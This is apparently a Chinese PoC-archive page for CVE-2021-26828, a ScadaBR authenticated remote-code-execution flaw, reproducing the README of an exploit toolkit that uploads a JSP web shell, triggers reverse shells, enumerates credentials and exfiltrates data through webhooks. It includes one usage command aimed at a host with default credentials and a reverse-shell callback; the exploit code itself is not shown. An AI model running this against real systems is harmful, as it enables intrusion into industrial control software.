POC详情: 304f9cf5eb15af421afef7d08df705f712caf358

来源
关联漏洞
标题: Sensorweb ScadaBR 代码问题漏洞 (CVE-2021-26828)
描述:Sensorweb ScadaBR是Sensorweb公司的一套用于开发自动化数据采集和监控应用程序的开源软件。 ScadaBR 1.0 / 1.1CE 存在代码问题漏洞。该漏洞源于网络系统或产品缺乏有效的权限许可和访问控制措施。
描述
ScadaFlare Authenticated RCE Exploit Framework for ScadaBR (CVE-2021-26828) OpenPLC ScadaBR 
介绍
# ScadaFlare - CVE-2021-26828 Authenticated RCE Exploitation Toolkit

A modular post-auth RCE exploit targeting ScadaBR <1.1.0, enhanced for red team ops.

![ScadaFlare Demo](scadaflare-demo.png)

## Features

- Uploads weaponized `.jsp` shell via `view_edit.shtm`
- Supports Linux & Windows payloads
- SOCKS5 / HTTP proxy support
- Reverse shell trigger (standard or base64)
- Enumeration modules (DB, creds, Log4Shell, etc.)
- Webhook exfil (Slack / Discord)
- Metasploit resource script generation
- Cleanup support (kill switch)

## CVE

- CVE-2021-26828
- Discovered by Fellipe Oliveira
- Exploit enhanced & modularized by Ridpath

## Why This Exists
This exploit was developed during analysis of the HTB Pro Lab: Alchemy scenario. The original PoC by Fellipe Oliveira was solid but:

Written in Python 2

Lacked modern features like proxy support, shell cleanup, enumeration chaining

Was difficult to extend or integrate into red team workflows

This version, ScadaFlare, is a full rewrite in Python 3 with modular support, multiple evasion strategies, OS detection override, webhook integration, SOCKS proxy support, and enumeration chains for real world operator use.

## Usage

```bash
python3 scadaflare.py http://172.16.0.20:80 admin admin \
  --reverse-ip 10.10.14.44 --reverse-port 4445 \
  --verbose --cleanup
```
### License
MIT License – see LICENSE.txt
文件快照

[4.0K] /data/pocs/304f9cf5eb15af421afef7d08df705f712caf358 ├── [1.0K] LICENSE ├── [1.3K] README.md ├── [176K] scadaflare-demo.png └── [ 39K] scadaflare.py 0 directories, 4 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。